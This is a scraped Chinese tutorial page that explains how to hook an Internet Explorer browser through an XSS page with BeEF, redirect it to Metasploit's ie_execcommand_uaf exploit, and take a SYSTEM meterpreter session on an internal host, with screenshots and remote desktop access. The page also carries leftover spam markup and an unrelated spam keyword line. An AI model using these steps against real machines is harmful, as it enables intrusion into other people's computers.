<form id="hz9zz"></form>
  • <form id="hz9zz"></form>

      <nobr id="hz9zz"></nobr>

      <form id="hz9zz"></form>

    1. 明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

      metasploit使用IE漏洞XSS掛馬拿內網主機

      [摘要]系統:KALI 用到的工具:beEF+msf 利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcom...

      系統:KALI

      用到的工具:beEF+msf

      利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf

      MS12-063
      AutomaticIE 7 on Windows XP SP3IE 8 on Windows XP SP3IE 7 on Windows VistaIE 8 on Windows VistaIE 8 on Windows 7IE 9 on Windows 7
      用到的beef+msf

      先配置下:

      root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# lsbeef beef_key.pem config.yaml db Gemfile modulesbeef_cert.pem bundle core extensions Gemfile.lock
      編輯下config.yaml
      把metasploit :false改成true

      metasploit利用IE漏洞XSS掛馬拿內網主機1

      再進入extensions/metasploit/
      同樣修改下config.yaml
      把host跟callback_host 改成自己的IP 這里是220.128

      metasploit利用IE漏洞XSS掛馬拿內網主機2

      再改動下custom path:

      metasploit利用IE漏洞XSS掛馬拿內網主機3

      這樣beef已經配置好了。那就運行下metasploit

      metasploit利用IE漏洞XSS掛馬拿內網主機4

      運行msf后 數據庫連接下,不然上線也會沒有提示的。這里的pass 就是extensions/metasploit/config.yaml里面的pass

      metasploit利用IE漏洞XSS掛馬拿內網主機5

      這樣就沒有什么問題。我們可以先看一下beef.數據庫只要連上了就不會出現msf的api錯誤的。

      metasploit利用IE漏洞XSS掛馬拿內網主機6

      進入beef

      metasploit利用IE漏洞XSS掛馬拿內網主機7

      賬號密碼beef 配置文件里面有。beef:beef

      metasploit利用IE漏洞XSS掛馬拿內網主機8

      那beef已經都OK了。
      現在來搞下選擇下要顯示的頁面:

      metasploit利用IE漏洞XSS掛馬拿內網主機9

      hook.js 運行beef 顯示出來的。
      別忘記運行下apache。

      metasploit利用IE漏洞XSS掛馬拿內網主機10

      我們再進入msf

      use exploit/windows/browser/ie_execcommand_uaf
      可以自己根據自己的要求來選擇。

      show options
      port可以自已改。

      metasploit利用IE漏洞XSS掛馬拿內網主機11

      我用xp+ie7

      metasploit利用IE漏洞XSS掛馬拿內網主機12

      直接訪問下我們的頁面192.168.220.128/xss/
      beef就會顯示出來了。

      metasploit利用IE漏洞XSS掛馬拿內網主機13

      點擊 commands-hookeddomain-REDIRECT BROWSER 讓他重新跳轉到我們msf生成的地址上。beef很多功能。
      把地址改成192.168.220.128:8080(msf生成的地址)

      metasploit利用IE漏洞XSS掛馬拿內網主機14

      我們就會看到msf上面已經顯示出來了。 回顯了sessions
      payload可以自己去改。我使用的meterpreter載荷

      metasploit利用IE漏洞XSS掛馬拿內網主機15

      執行sessions -i

      metasploit利用IE漏洞XSS掛馬拿內網主機16

      執行sessions -i ID號
      可以執行任意命令已經是系統權限

      metasploit利用IE漏洞XSS掛馬拿內網主機17

      執行下screenshost

      meterpreter > screenshot Screenshot saved to: /root/dlsSQBkF.jpeg
      就可以看到當前主機的屏幕內容。

      metasploit利用IE漏洞XSS掛馬拿內網主機18

      也可以rdesktop 遠程連接上去。
      參數rdesktop -f ip -u username -p password
      這也是一種xss掛馬拿內網主機。

      注:鄙人每天都在寫一些metasploit的玩法,如果有大神有什么好的方法希望告訴我,我更新在空間,分享給大家。


      上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




      日韩精品一区二区三区高清